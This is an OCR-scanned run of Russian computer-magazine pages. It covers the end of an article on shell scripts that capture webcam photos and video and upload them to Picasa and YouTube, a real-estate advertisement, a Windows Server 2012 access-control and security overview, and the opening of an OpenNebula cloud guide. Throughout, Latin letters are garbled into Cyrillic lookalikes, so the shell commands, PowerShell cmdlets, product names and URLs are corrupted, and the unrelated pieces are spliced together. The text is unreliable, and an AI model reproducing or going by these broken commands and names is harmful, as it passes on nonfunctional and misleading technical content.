У1Ч9ео ир1оадео: [11рз: //шыш. чоцфиБе . сот/шат сп? у=КедУВ/та ]СВ&Театиге=уоуфи6е_ддафа 
р. 


Загружаем видео в УоцТибе 


$ м1 -/61п/мебсатега-р1саза. $Н 

#1! /Б1п/ $ И 

тр]1ауег %\:// -Ргатез 3 -у+ Я1р -уо ]рей 
ОАТЕ=`Аафе +%Е-Н-#М` 

пу 00000003.3р= ${РАТЕ}. ре 
0021е р1саза роз МебСатега 
гп -+Р- 0000*.]ре ${ОАТЕ}. ]рё 


ОАТЕ. - -Е11е ОАТЕ 


Это все, теперь на скрипт можно поставить бит исполнения и использовать его для ка- 
ких угодно целей. Например, добавить в сгоп задание, которое будет запускать его каждый 
час или каждый день. Все снимки будут иметь имя в виде времени съемки, и ты в любой мо- 
мент сможешь посмотреть их в Соод[е+, где бы ты ни находился. Таким же образом, кста- 
ти, можно организовать загрузку фотографий в Огорбох, просто заменив предпоследнюю 
строку на «тм ${ОАТЕ}./ра -/ОгорБох/». 


АВТОЗАГРУЗКА ВИДЕО ВУОЦЧТОВЕ 
Таким же образом можно организовать автоматическую съемку и загрузку видео вУочТиВе. 
Для этого сначала разрешим СооЧес( работать с сервисом: 


0051е уоифибе 115% 
Как в случае с Р'саза, вводим адрес своей электронной почты и нажимаем «Разрешить» 
в открывшемся окне. Далее можно попробовать загрузить тестовое видео для проверки 


работоспособности: 


$ 2гоо=1е уоичфибе роз у14ео.ау1 --ассез5=рг1уаее --сажевогу Едиса1оп 


Видео будет загружено в раздел Едисайоп (УочТире требует указания имени раздела) 
и сделано приватным, так что никто, кроме тебя, его не увидит. В случае успешной загрузки 
ты получишь ссылку на видео. Если все ОК, можно приступать к реализации скрипта. Вы- 
глядеть он будет так: 


$ м1 -/61п/мебсатега-уоцфиБе. $! 

#1 /б1п/5И 

ТТМЕ='1:00' 

ОАТЕ=`Аафе +%Е-ЖН-%М` 

тепсодег %\:// -рз 15 -\+ Я1р -оус 1аус -1аусор®$ усо4дес=тре84 ‹= 
-позоипа -епароз ФТТМЕ -о ${БАТЕ} .тре 

50021е уоцфибе ро$5* ${ОАТЕ}.трё --ассез=рг1уае --сафевогу Едиса1оп 
гт_-+ ${ОАТЕ} . тре 


Для съемки здесь использован тепсоаег с преобразованием в формат МРЕСА. Дли- 
тельность съемки указана в переменной Т!МЕ и по умолчанию составляет одну минуту. 
Сразу после окончания съемки видео будет загружено в УочТибе показанным выше спосо- 
бом. Как и в случае с Раза, вместо публикации в УочТибе видео можно просто скопировать 
в Огорбох: «ср ${ОАТЕ}.тра -/ОгорБох». 

Такой скрипт можно использовать разными способами, включая запуск съемки по за- 
просу через ЗН или какой-нибудь Сооде Так, либо добавить в задание сгоп и регулярно 
получать сводки с места событий в свой аккаунт в УоцТире. 


ВЫВОДЫ 

Несмотря на нелюбовь многих из нас к социальным сервисам, они могут сослужить нам 
хорошую службу как средство для достижения собственных целей. В конце концов, хакер- 
ство — это и есть поиск обходных путей и нахождение нетривиальных решений проблемы. 
Так почему бы с его помощью не превратить бесполезные для некоторых из нас инструмен- 
ты в полезные? 2 


ИВА монолит 


ЖИЛОЙ КОМПЛЕКС 


«МЕЩЕРИХИНСКИЕ 
ДВОРИКИ», Г. ЛОБНЯ 
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ПО ВОПРОСАМ ПРИОБРЕТЕНИЯ КВАРТИР 
(«МОНОЛИТ НЕДВИЖИМОСТЬ) 


^\ 


141006, Московская область, 
г. Мытищи, Олимпийский проспект, д. 48 


Тел.: (495) 660 96 31, (495) 662 74 50, 
факс: (495) 660 96 41 


Группа компаний «Монолит» приглашает к зна- 
комству с новыми жилыми домами в комплек- 
се «Мещерихинские дворики» на улице Моло- 
дежной уютного подмосковного города Лобня. 


До места встречи можно добраться от м. Алтуфьев- 
ская автобусом №459 или с Савеловского вокзала на 
пригородной электричке до ст. Лобня далее 7-10 мин. 
автобусом №1. Ближайшие транспортные магистра- 
ли — Дмитровское, Ленинградское шоссе. 


В жилом комплексе «Мещерихинские дворики» 

вас ждут два прекрасных 17-этажных двухподъезд- 
ных дома под номерами 14а и 14Б. Это - надежные 
монолитно-кирпичные здания, оснащенные всем 
необходимым для жизни, в том числе грузовым 

и пассажирским лифтами. 


Здесь вы сможете выбрать для себя светлые и про- 
сторные квартиры современной планировки - одно, 
двух и трехкомнатные. В квартирах предусмотрены 
пластиковые стеклопакеты, радиаторы с терморегуля- 
торами, электроразводка, застекленные лоджии и т.д. 


Для любителей прогулок организована зона отдых, 
украшенная декоративными кустарниками и деревья- 
ми, благоустроенная игровая площадка для детей, 

а для автомобилистов -— стоянка. Молодых родителей 
порадует новый детский сад в шаговой доступности. 


Группа компаний «Монолит» надеется, что после пер- 
вой же встречи с новой квартирой, у Вас возникнет с 
ней взаимная симпатия и долгие надежные отношения. 


Условия приобретения квартир: рассрочка пла- 
тежа, ипотека, взаимозачет Вашей старой квартиры 
на Вашу новую. Возможны скидки при условии 100% 
оплаты и использовании ипотечного кредита. 


(495) 739-93-93, 967-65-57 


Г. МОСКВА, УЛ. БАУМАНСКАЯ, ДОМ 33/2, СТР. 1 


ГРУППА КОМПАНИЙ «МОНОЛИТ» - ОДНО ИЗ КРУПНЕЙШИХ ПРЕДПРИЯТИЙ-ЛИДЕРОВ 
МОСКОВСКОЙ ОБЛАСТИ, ДЕЙСТВУЮЩИХ НА СТРОИТЕЛЬНОМ РЫНКЕ С 1989 ГОДА. 
ОСНОВНЫМ НАПРАВЛЕНИЕМ ДЕЯТЕЛЬНОСТИ ГРУППЫ КОМПАНИЙ «МОНОЛИТ» ЯВЛЯЕТСЯ 
ВОЗВЕДЕНИЕ ЖИЛЫХ ЗДАНИЙ И ОБЪЕКТОВ СОЦИАЛЬНОГО НАЗНАЧЕНИЯ ПО ИНДИВИ- 
ДУАЛЬНЫМ ПРОЕКТАМ. В ОСНОВЕ ЛЕЖИТ ТЕХНОЛОГИЯ МОНОЛИТНОГО ДОМОСТРОЕНИЯ. 


С подробными схемами планировок квартир 

и проектной декларацией можно ознакомиться 
на сайте м/мими.дК-топоШ.ги или в офисе 
компании «Монолит недвижимость» 


Группа «Монолит» активно работает с ведущими Город Лобня расположен в лесопарковой зоне 
банками по программам ипотечного кредито- Подмосковья, в ближайшем окружении имеются 
вания. Особое внимание уделяется правовой живописные озера и пруды. Недалеко от Лобни - 
защищенности клиентов, приобретателей ансамбль бывшей усадьбы Марфино, несколько 
жилья и нежилых помещений. центров русских народных промылов. Культурная 


жизнь города сосредоточена в основном в Куль- 
турно-досуговом центре «Чайка» и парке Культуры 
и Отдыха, есть театры и музеи, художественная 
галлерея. Для любителей спорта - два бассейна, 
ледовый каток, Дворец спорта «Лобня». 
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л\\ ПО ВОПРОСАМ АРЕНДЫ ПОМЕЩЕНИЙ (985) 727-57-62 


(ООО «МОНОЛИТ АРЕНДА),) 


722 $УМ/АСК 


ТЕХНОЛОГИИ БЕЗОПАСНОСТИ 
МЛМООМ/ ЗЕВУЕВ 2012 


В корпоративной сети могут работать сот- 
ни компьютеров, география подключений 
нередко охватывает все регионы планеты. 
Повальный переход на облачные техноло- 
гии, рост объема информации, доступ к ней 
из разных точек требует обеспечить безопас- 
ность данных и управляемость инфраструкту- 
ры. И в первую очередь необходим контроль 
пользователей и устройств. 


СЛУЖБЫ ПОЛИТИКИ СЕТИ И ДОСТУПА 

Сегодня очень популярна технология ВУОБ (Випда Уоиг Омп Оемсе), когда 
сотрудники используют в работе свои личные устройства, за которыми сле- 
дят самостоятельно. Это удобно всем: компания избавляется от постоян- 
ной заботы закупать и обновлять оборудование, а пользователи работают 
с любимыми и современными гаджетами. Однако ради удобства пользова- 
тель может отключить службу установки обновлений, переконфигурировать 
брандмауэр или работать с устаревшими антивирусными базами. Это приво- 
дит к увеличению рисков, такие устройства несут потенциальную опасность 
для остальных систем. Чтобы избежать проблем при подключении личных 
устройств к корпоративной сети, следует контролировать их состояние. 

Новая функция Мемогк Ассез$ РгоесНоп, появившаяся в \\т2К8, прове- 
ряет ОС на соответствие принятым политикам. На основе анализа состояния 
для конкретного устройства можно ограничить доступ, разрешить полный до- 
ступ временно или постоянно. Все события журналируются, и админ всегда 
располагает свежей информацией о проблемах. 

В карантинной подсети располагаются коррекционные серверы 
(Ветед!аНоп Зегуег), предоставляющие ресурсы для устранения выявленных 
недостатков (сервер обновлений \\/ЗИ5, антивирусная база). После устране- 
ния проблем система повторно подключается и проверяется, если все в нор- 


ЕЖОВЫ 
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Сергей Яремчук 
дппдег@зупаск.ги 


ме, она получает полноценный доступ в сеть. В процессе работы состояние 
системы контролируется постоянно, и если оно перестает удовлетворять 
требованиям политик, то устройство снова переводится в карантин (или вы- 
полняется любое другое действие, предписанное админом). По сути, кон- 
троль состояния и карантин — это вся роль МАР все остальное реализуется 
сторонними механизмами. При настройке МАР используется несколько меха- 
низмов принуждения (ОНСР \РМ, 1Р$ес, 1ЕЕЕ 802.1х и другие). 

На удаленной системе устанавливается клиент МАР, состоящий из агента 
МАР, агента состояния системы (\М/тао\м$ Зесищу НеаЦнп Адеп\) и клиента при- 
нуждения (МАР Епогсетет Сйеп). Последний и отвечает за взаимодействие 
с механизмом принуждения. Собранные данные клиент отправляет серверу 
сетевых политик (МР$, Мемогк Ройсу Зегуег) в виде 5НУ\У-маркера (ЗуЗет 
Неайп \айдатог$). 

Агент уже включен во все версии ММпаом/$ отХР $Р3З, поддерживается инте- 
грация с С!5со Мемогк Аапт!5юп Сотто! (МАС). Сторонние фирмы предлагают 
клиенты МАР для ОЗХи Ипих и могут добавлять требуемую функциональность 
в МАР. Например, решение Зутащес Епаройт РгдесНоп содержит дополни- 
тельные модули, позволяющие проверять состояние при помощи МР5. 

Роль сервера «Службы политики сети и доступа» можно использовать 
для развертывания собственно службы МР$ либо сервера и прокси-сервера 
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Первоначальные настройки МР$ задаются при помощи готового сценария 


ВАБ$, выполняющего авторизацию при запросах на подключение со сторо- 

ны клиентов РАБЩ$ (коммутаторы Епет с поддержкой 802.1Х, хотспоты). 

Все настройки производятся при помощи диспетчера сервера или утилиты 

п@зй (контекст пеа$п пр, все команды можно узнать в документации: ч00. 

о/70!АЦ). 

В ММп2К8В2 служба МР$ получила возможность использовать несколько 
конфигураций $Н\, что позволяет создавать свои политики для систем, под- 
ключающихся по разным каналам (ЕАМ, УРМ). Также появились новые шабло- 
ны, упрощающие создание и экспорт элементов конфигурации МР5. 

В М/п2012 служба маршрутизации и удаленного доступа, которая раньше 
была частью МР$, выведена в отдельную роль сервера удаленного доступа. 
Сделано это, чтобы уменьшить путаницу при развертывании. Для роли сер- 
вера МР$ понадобится физический или виртуальный (Нурег-\/) сервер, кла- 
стеры не поддерживаются. 

Установка сервера МР$ производится при помощи мастера добавления 
ролей и компонентов, просто отмечаем пункт «Службы политики сети и до- 
ступа» и следуем его указаниям. Роль содержит три службы ролей: 

. сервер политики сети — используется для централизованного управ- 
ления доступом к сети через разнообразные серверы доступа, вклю- 
чая точки беспроводного доступа, УРМ, серверы удаленного доступа 
и 802.1Х-коммутаторы; 

. центр регистрации работоспособности (НВА) — компонент, отвечающий 
за выпуск сертификатов работоспособности для клиентов, проходящих 
проверку политики. Используется только с принудительным методом про- 
токола |Р$ес; 

. протокол авторизации учетных данных узлов (НСАР) — позволяет объеди- 
нить решение для защиты доступа к сети от М$ с сервером управления 
сетевым доступом от компании С! 5со. 


В случае выбора НВА потребуется связать его с центром сертификации 
(это можно сделать позднее, после установки). Выдача сертификатов воз- 
можна как зарегистрированным в домене пользователям, так и анонимным 
(всем). Если МР$ работает в доменной сети, то предпочтителен первый ва- 
риант. Все установки производятся из консоли «Сервер групповых политик». 
Первоначальные настройки задаются при помощи готового сценария, просто 
выбираем нужный из списка и следуем указаниям мастера. Политики позво- 
ляют задать группы (\М/Мтаом/5, компьютеров или пользователей), НСАР (груп- 
пы пользователей и размещения), ограничения по дням недели и времени, 
типу удостоверения, классу 1Р, ОС и архитектуре, критерию политики работо- 
способности и другим параметрам. 

У каждого контроллера домена, работающего на \\п2012, должна быть 
та же настройка политики административных шаблонов (Конфигурация ком- 
пьютера —› Политики —> Административные шаблоны -> Система -> КОС ->» 
Поддержка динамического контроля доступа и защиты Кегфего$). 

В \!т2012 также добавилась возможность использовать РомегэПей 
для установки и настройки некоторых параметров роли МР$, поэтому многие 
операции можно выполнить из консоли. Ставим и смотрим новый набор из 13 


командлетов (900.9/С1505). 
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Определяем параметры безопасности клиента 


Р5> Ттрог{-Моаи1е МР5 
Р$> беЕ-Соттапа -Моди1е М№Р$ 


Например, командлеты Ехрой/тро“-МРЗСопЙдигайопт позволяют со- 
хранить и восстановить конфигурацию МР$-сервера. Они заменят пеа5$п 
пр$ ехро\/итрой, выполняющие аналогичную функцию. Вызов прост. Со- 
храняем: 


Р5> Ехрог{-МрзСопйвига*1оп 
Мр$сопйФ. хт1 


—РаЕй С:\МР5Тетр -РаЕИ += 


Файл содержит данные НАП!5$-клиентов, поэтому необходимо позабо- 
титься, чтобы никто не получил к нему доступ. Теперь на другом сервере им- 
портируем, просто указав на файл. 


Р5> ТтрогЕ-МрзСопйгига Тот -РаЕИ С: \Мрзсопй?.хт1 


Как и п@$И, командлеты РомегЗпе! не поддерживают перенос настроек 
шаблонов. Это доступно через интерфейс консоли. 


ДИНАМИЧЕСКОЕ УПРАВЛЕНИЕ ДОСТУПОМ 

Многие годы в \/том/5$ используется механизм управления доступом 
на уровне пользователей и групп. Выдержав проверку временем, он работает 
хорошо, тем не менее он уже не всегда подходит для современных условий, 
когда имеет значение не только должность пользователя, но и его роль и даже 
текущее местоположение. Пользователь может работать в защищенной ло- 
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Настройка классификации документов 
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МИпдом$ Агиге АррРабпс 
состоит изтрех основ- 
ных компонентов: Ассе$$ 
Согго! (управление 
доступом), Виз Зегмсе 
(сервис шины) и Саспе 
(кеш — ассоциативная 
память). 


МЛ 


Агент МАР для Мас 
и Ипих: ип@зу${ет.со.Кг 


Ауепда Ипих МАР Адет: 
ауепдазу$.сот 


Страница службы по- 
литики сети и доступа 
на сайте Мисго$оН: 


000.01/8 Моск 
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кальной сети или подключаться через общественную точку до- 

ступа. Человек один, а риски для бизнеса разные. 

Особо остро этот вопрос стоит сегодня, так как по стати- 
стике большинство утечек происходит по вине инсайдеров 
(намеренной или случайной), которые имеют легальный до- 
ступ к некоторой информации. В результате, чтобы перекрыть 
все потребности, создается большое количество групп, что се- 
рьезно усложняет администрирование, в частности понимание 
того, кто и куда действительно имеет доступ. Малейшая ошибка 
пользователя или админа — и документ оказывается не на сво- 
ем месте и имеет ненадлежащие права доступа. Современным 
организациям остро необходим простой в использовании ме- 
ханизм предотвращения утечки информации (РЕР, Ваа 1еак 
Ргеуепйоп). 

Защитить содержимое можно при помощи службы управ- 
ления правами (РоШ$ Мападетепт Зегмсе$), но она снимает 
только часть проблем. Более глобально задачу управления до- 
ступом и аудита призвана решить технология динамического 
управления доступом (Рупаптс Ассе5$ Сотго[5, АС). Техноло- 
гия базируется на трех основных понятиях: 

. классификация документов — на основе тегов, которые 
добавляются пользователем при создании/редактирова- 
нии документа (в свойствах), приложением, наследуются 
от каталога или присваиваются по контексту. Если документ 
не классифицирован, то используются только традицион- 
ные средства доступа; 

. политики — состоят из одного или нескольких правил, ос- 
нованных на выражениях, описывающих условия доступа 
для утверждений пользователей/устройств и тегов. Выра- 
жения содержат атрибуты Асй\е Отестогу и, по сути, являют- 
ся основой ПАС, показывая, кто и на каких условиях может 
получить доступ; 

. аудит — расширенные политики аудита, позволяющие полу- 
чить информацию о попытках доступа к конфиденциальной 
информации. 


Реализована интеграция РАС со службой АМ$, что позволя- 
ет в реальном времени защищать документы, которым присво- 
ен соответствующий тег. Настройки упрощает автоматическое 
тегирование документов, которое создается при помощи пра- 
вил, настраиваемых в диспетчере ресурсов файлового сервера 
(ЕИе Зегуег Везоигсе Мападег). 

Для реализации ВАС система безопасности \М/п2012 полу- 
чила новый механизм утверждения с1аит$, такие утверждения 
существуют для ресурсов, пользователей и учетных записей 
компьютеров. При входе в систему помимо идентификатора 
безопасности ЗО (Зесищу АепиНег) учетной записи в маркер 
добавляются с!аит$ (просмотреть их можно, введя «мпоати 
сайт$»). Вот эти утверждения, вместе с данными об участии 
в группах, и используются при доступе к объектам файловой си- 
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стемы. При этом старые механизмы никуда не исчезли. Вначале 
применяются права доступа к сетевому ресурсу, затем МТЕ$, и, 
наконец, вступает в работу БАС. 

Одна из особенностей РАС — возможность постепенного 
внедрения, когда администратор вначале настраивает полити- 
ки ОАС без блокировки, только в режиме аудита. Это позволит 
выяснить, кто и куда пытался получить или получил доступ, от- 
ловить излишне любопытных и впоследствии установить блоки- 
ровки более точно, сведя к минимуму жалобы пользователей. 

Учитывая, что в современных условиях ситуация быстро ме- 
няется, необходим механизм быстрого решения проблем с до- 
ступом, и БАС его предоставляет. Пользователю, получившему 
отказ, приходит сообщение с вариантами восстановления до- 
ступа — прямая ссылка на сайт или справка с объяснением. 
На сайте пользователь получает дополнительную информацию, 
например соглашение о неразглашении, которое нужно под- 
твердить. После выполнения требований с!ат$ обновляются, 
и пользователь получает доступ. Политики задаются централи- 
зованно на уровне домена, распространяются при помощи СРО 
и указываются в настройках конкретного ресурса. В первом 
случае установки задаются в консоли центра администрирова- 
ния АсН\уе Опестогу (АБВАС, Асфуе Опецогу Адатиттануе Сещег), 
в котором находится специальный подраздел, содержащий во- 
семь пошаговых настроек. На каждом необходимо будет запол- 
нить предложенные мастером поля. 

Первым идет настройка утверждений, где доступно более 
100 атрибутов АсН\е Опестогу, каждый из которых может при- 
сутствовать в с1айт$. Для удобства поиска предложен фильтр. 
Например, атрибут Черащатеп{ описывает отдел, в котором 
работает пользователь. Последовательно отбираем нуж- 
ные, создавая с!ап1$. Поле «Предложенные значения» по- 
зволяет указать требуемые значения атрибутов. Например, 
для аерайатет прописываем названия отделов, для которых 
будем создавать политики. Вторым шагом идет настройка 
свойств ресурсов (Везоигсе Ргорейез$), позволяющих клас- 
сифицировать конкретные файлы и папки. По умолчанию уже 
создано несколько свойств, которые нужно отредактировать 
и включить или добавить новые. Переходим кшагутри — созда- 
нию централизованного правила доступа (Сетга! Ассез$ Вице), 
где выбираем критерии целевых ресурсов и разрешения. Про- 
цесс прост: выбираем из списков свойства, указываем значе- 
ние и задаем права (система предложит разрешения, их можно 
отредактировать и применить). В итоге все ресурсы, которые 
будут помечены соответствующим тегом (указанным в значе- 
нии), будут попадать под правило. Так как правил может быть 
несколько, то для удобства применения на следующем шаге их 
объединяют в политики (Сещга! Ассез$ Ройсе$). 

После создания политик они должны быть опубликованы 
на файловом сервере. Для этого вызываем редактор групповой 
политики, переходим в «Конфигурация компьютера -> Полити- 
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Для настройки динамического контроля доступа необходимо пройти восемь шагов 
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Динамическим контролем доступа можно управлять при помощи командлетов 
Ромег5З пей 


ки —> Конфигурация \\Ипаом/5 —> Файловая система -> Централизованная политика 
доступа». Выбираем в контекстном меню пункт «Управление централизованными 
политиками доступа» и в списке созданные ранее политики, которые необходимо 
применить. Собственно, это все. 

Для управления аудитом следует перейти в «Конфигурация расширенной по- 
литики аудита —» Политика аудита -> Доступ к объектам», где в \\т2012 появился 
новый пункт «Аудит сверки с централизованной политикой доступа». 

Теперь применяем политику. Переходим в свойства документа/каталога, вы- 
бираем «Дополнительно» и переходим во вкладку «Централизованная политика», 
выбираем в раскрывающемся списке нужную политику. Новая возможность полу- 
чила свой набор из 58 командлетов Ромег® Вей, которые относятся к модулю Ас\е 
Онесогу (ч00.9/304СС). Например, при помощи С@щ-АБСемщга!Ассез$$Ройсу мо- 
жем получить информацию обо всех центральных политиках доступа. 


Р5> беф-АОСепга1Ассе$$Ро11су -Е11%ег * 


АУТЕНТИФИКАЦИЯ ПОЛЬЗОВАТЕЛЕЙ СМИМОО\М!$ АРОВЕ АРРЕАВЕ!С 
Сегодня организация может использовать десятки серверов и приложений, раз- 
мещенных на разных платформах, к которым необходимо обеспечить безопасный 
доступ. Если приложения разнородные и для идентификации используют разные 
стандарты, это становится проблемой. М!сго5оЙ предлагает для ее решения сер- 
вис \ЛИпао\м/$ Ахиге АррЕГабис Ассез$ Сотто! Зегмсе (АСЗ, чоо.9/2атавН), позво- 
ляющий реализовать механизмы федеративной авторизации и обработку запро- 
сов на основе декларативных правил. Сервис, к которым обеспечивается доступ, 
не обязательно должен работать в среде Алиге, это может быть любая (в том числе 
не \\ММпао\м/5) платформа или приложение, работающее на популярных языках, вклю- 
чая уауа, Виру, РНР Как ясно из названия, сервис относится к Алиге Габис и вы- 
ступает в роли посредника между приложением и провайдерами идентификаций 
('Аепщу ргомаег$) — базой данных пользователей. АС$ использует принцип иден- 
тификации на основе заявок (с1аит$-базеа епщу), каждая сущность в процессе 
идентификации играет одну или более канонических ролей: субъект (зиЦес\), про- 
вайдер идентификации (еп у ргомаег), доверяющая сторона (ге!ута рацу) и про- 
вайдер федерации (Тедегайоп ргомаег). Поддерживаются стандартные механизмы 
аутентификации (Ореп0, ОАшн М/ВАР ОАшИ 2.0, \М5-Тги${ и \\М5-Редегайоп), инте- 
грация с \ММпаом/$ Ыме О, Аси\е Отесогу, Сооде, Уапоо!, Еасебоок и так далее. Сам 
АррРабийс Ассез$$ Сотто! (АЗС) базируется на М/паом/$ 1Чепу ГоипаанНоп (\МЕ, рас- 
ширение Мсго5оЙ .МЕТ Егатемогк) и представляет собой сервис, специально соз- 
данный для обеспечения безопасности облачных вычислений. Модель \МЕ отделяет 
приложение от деталей того, как происходит аутентификация, и от низкоуровневых 
деталей, предлагая удобную абстракцию, позволяющую просто указывать внеш- 
ний механизм. Все установки можно выполнить с помощью специального мастера 
в Миа! З+иаю, писать код не требуется. Для новичков будут интересны примеры (51. 
|у/Х78!6у), позволяющие разобраться, как интегрировать АС$ с веб-сервисами. 


ЗАКЛЮЧЕНИЕ 

Меанизмы управления доступом, применяющиеся в различных ОС, сегодня вряд 
ли можно назвать достаточными. Новшества, которые появились в М/п2012, позво- 
ляют на порядок снизить риски и обеспечить максимальную безопасность данных. 
Дело осталось за малым — их внедрить. == 


72.5 


Дополнительные функции 


ИНТЕГРАЦИЯ БАС И ВМЗ 


Для полноценной защиты конфиденциальной инфор- 
мации необходимо применять шифрование. Инте- 
грация ВАС и АМ$ позволит все проделать автома- 
тически на основе тегов или содержания документа, 
причем настройки дают возможность зашифровать 
и ранее созданные документы. Для работы следует 
активировать свойство ресурсов |трасф, позволяю- 
щее классифицировать ресурсы по одному из трех 
значений важности. Далее в консоли диспетчера 
ресурсов файлового сервера, в разделе «Управле- 
ние классификацией -> Правила классификации» 
(СаззШсаНоп Мападетегт > СаззйсаНопт Виез$) 
создаем правила, в которых указываем тип и рас- 
положение файлов, метод классификации (\\Лпо0м/$ 
Ромегэпей, папки или содержимого) и собственно 
строки или регулярные выражения, совпадения 

с которыми будут активировать правило. Здесь 

же указываем, какое значение присвоить доступ- 
ным атрибутам. В раскрывающемся списке можно 
увидеть все созданные ранее атрибуты, нас в данном 
случае интересует траст. Чтобы привести меха- 
низм в действие, переходим в «Задачи управления 
файлами», где создаем новую задачу. Указываем 
название, папки, настраиваем оповещение и рас- 
писание. Во вкладке «Действие» выбираем «Шиф- 
рование ВМ$» и доступный шаблон АМ$5. Во вкладке 
«Условие» следует указать свойство файла, которое 
приведет к выполнению задания. 


БИОМЕТРИЧЕСКАЯ 
АУТЕНТИФИКАЦИЯ 


Требования к сложности пароля с каждым днем 
ужесточаются, также растет количество сервисов, 
с которыми приходится работать пользователю. 
Все это удержать в голове затруднительно, да и со- 
трудники часто забывают пароли, нагружая саппорт. 
Поэтому нередко юзеры идут на упрощения, исполь- 
зуя одну комбинацию на разных ресурсах. Достаточ- 
но взломать один пасс, и получаем доступ ко всему 
остальному. Выхода два — использовать биометри- 
ческую или аппаратную (смарт-карты) аутентифи- 
кацию. Это как минимум удобно, ведь уже не нужно 
ничего запоминать. При биометрии все необходимое 
у пользователя всегда с собой: для идентификации 
используются уникальные характеристики человека, 
наиболее популярен из методов отпечаток пальца. 
Раньше поддержка средств биометрической аутенти- 
фикации обеспечивалась специальными драйверами 
и ПО, поставляемыми производителями. Для про- 
граммистов производители предлагали собственный 
ЗОК (известны как коммерческие, так и опенсорсные 
решения). Каждый реализовывал механизм как хо- 
тел, единого стандарта не было. Начиная с \\Мтаом 7, 
М'сго$ой предлагает свой вариант — специальный 
фреймворк \ММтаом$ Вотештс Егатем/огк (\М/ВЕ доо. 
ИО;У7 К). Управляют процессом при помощи четырех 
объектов групповой политики, которые находятся 
в «Конфигурация компьютера -—+ Политики —› Адми- 
нистративные шаблоны —› Компоненты \\Ипом/$ —> 
Биометрия». Изменилась в\/т2012/8 и поддержка 
смарт-карт: появились виртуальные смарт-карты, 
изменился порядок взаимодействия с пользователем 
и логика запуска/остановки службы. 


126 $УМ/АСК 


Сегодня все больше организаций, когда оборудование физи- 
чески и морально устаревает, начинают задумываться о пре- 
имуществах виртуализации и поддержании двух-трех серве- 
ров вместо целого парка. Вот и мне предстояло определить 
наиболее подходящее решение, позволяющее перенести 
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часть систем в виртуальный мир. В результате поисков и экс- 


периментов выбор пал на проект ОрепМебуа. 


ОПРОЕКТЕ ОРЕММЕВИЕА 

Выбор технологий и решений виртуализации сегодня очень большой, каждый 
производитель гипервизора предлагает десятки дополнительных надстроек, 
расширяющих базовый функционал. В итоге разобраться во всем этом мно- 
гообразии и выбрать наиболее удобное и оптимальное ПО нелегко. 

После изучения возможностей, предоставляемых такими опенсорсны- 
ми платформами, как Ечсаур\и$, ОрепЗаск, СочаЗаск и ОрепМебща, ре- 
шено было остановиться на последнем варианте, и вот почему. Настройки 
Ечсаур\фи$ (еиса!ур1и$.сот) не всегда понятны и требуют постоянного чте- 
ния документации, соответственно, вероятность допустить ошибку доволь- 
но высока. Набирающий обороты и несколько более простой в настройках 
Орепаск (орепзаск.ога) только к лету 2012-го разобрался с лицензией 
(теперь исключительно Араспе Исеп$е), но сам проект не оставил впечатле- 
ния целостного решения. Вероятно, потому, что изначально любой элемент 
можно заменить другим. В итоге получается хорошая головоломка, которую 
можно сложить, но придется постараться, чтобы заработало так, как требует- 
ся. Разрабатываемый под крылом Араспе Соца$аск (соцазаск.араспе.ога) 
четвертой версии показался весьма интересным. Во всяком случае, уста- 
новка относительно проста, а процесс конфигурирования вполне логичен. 
Но при более близком знакомстве обнаружилось, что некоторые установки 
винтерфейсе Соца$аск Мападтег( Зегуег недоступны, а попытка что-то по- 
править штатным инструментом гипервизора не всегда правильно интерпре- 
тировалась. Воттак и пришли к ОрепМебца (ореппебща.ога), которая произ- 
вела впечатление в меру простой, логичной и функциональной. 

Проект стартовал в 2005 году как научно-исследовательский, поддер- 
живается сообществом и изначально распространялся с открытым исход- 
ным кодом (Араспе Мсепзе). Развитие спонсируется большим количеством 
организаций, среди которых СЕРМ, Еегт аб, СПта Моб!е, Европейское 
космическое агентство и другие. ОрепМебща представляет собой откры- 
тую и расширяемую платформу автоматизации работы ЦОД, позволяю- 
щую развернуть на уже имеющихся серверах публичный, приватный или 
гибридный 1аа$, функционально схожий с Атагоп ЕС2. На физическом 
сервере и кластере одновременно можно использовать разные гиперви- 


КОЛЫБЕЛЬ 
ОБЛАКОВ 


ПОШАГОВОЕ РУКОВОДСТВО ПО РАЗВЕРТЫВАНИЮ 
|ААЗ-СЕРВИСА НА БАЗЕ ОРЕММЕВИТА 


ПМЕО 


Программное обе- 
спечение ОрепМебша 
ставится только на 
управляющий сервер 


«о 


ААА 


Сайт Еисаур{из: 
еиса[ур{и$.сот 


Сайт Ореп${аск: 
орепз{асК.ога 


Сайт СоцаЗТаск: 
соид${асК.арасНе.огод 


Сайт ОрепМебшща: 
ореппеБу!а.огд 


зоры, в настоящее время это Хеп, К\/М и УМ\гаге, в качестве гостевых будут 
работать любые из поддерживаемых гипервизорами ОС. Реализован ин- 
терфейс кАтагоп ЕС2, поддерживается АР! — ЕС2 Оицегу, ОСЕ ОССТ, уСоца 
и свой. Модульная архитектура позволяет интегрировать ОрепМебша с лю- 
бой платформой виртуализации, хранилищем данных или менеджером 
управления. Поддерживаются все присущие облакам технологии и функ- 
ции, включая Шуе М!огайоп (виртуальную машину можно легко перенести 
на другой сервер). 

Ядро ОрепМеб\а написано на С++, утилиты управления — наВиру и зПе!. 
Все релизы называются в честь звездных туманностей (англ. пеб\ща). 


ИНФРАСТРУКТУРА ОРЕММЕВИЕА 

Управляют инфраструктурой ОрепМебща с помощью управляющего сервера, 
так называемого фронтенда, который может работать на Ипих или ОЗ Х. Обмен 
данными между управляющей машиной и узлами облачного кластера проис- 
ходит по протоколу Э$ЗН. Для хранения параметров ОрепМеб\ца использует 
базу данных МузОЕ либо ЗОЩе. Реализовано управление образами дисков, 
горячее подключение, репозиторий шаблонов, управление всем жизненным 
циклом \/М (создание, клонирование и так далее) и учетными записями (поль- 
зователь, группа, роли). Подсистема хранения образов дисков поддерживает 
несколько хранилищ ЗАМ и МАЗ. Доступ к образам с любого узла кластера ор- 
ганизован по протоколам Э$Н, МЕ$, ЭЕТР, НТТР СФичегЕ$, Шизе, 5СЗИММ. 
Виртуальные сети создаются в УЧиа! Ме\могк Мападег, который обеспечивает 
нужный уровень абстракции и изоляции, поддерживается несколько техноло- 
гий: аитту, раЫе$, еМаЫе$, Ореп "змсй, 802.10 МЕАМ и УМ\цмаге. 

Для удобного управления виртуальными ресурсами и учетными запися- 
ми применяется несколько уровней абстракции. Физические серверы объ- 
единяются в кластеры, которые уже могут распределять и балансировать 
нагрузку. Несколько установок ОрепМебцща объединяют в зоны (0о2опез), 
доступ к которым организован через абстрактный дата-центр, содержащий 
собственный набор ресурсов и учетные записи. Используется также концеп- 
ция групп, каждая из которых имеет индивидуальные установки и набор до- 
ступных ресурсов, не пересекающихся с остальными. 


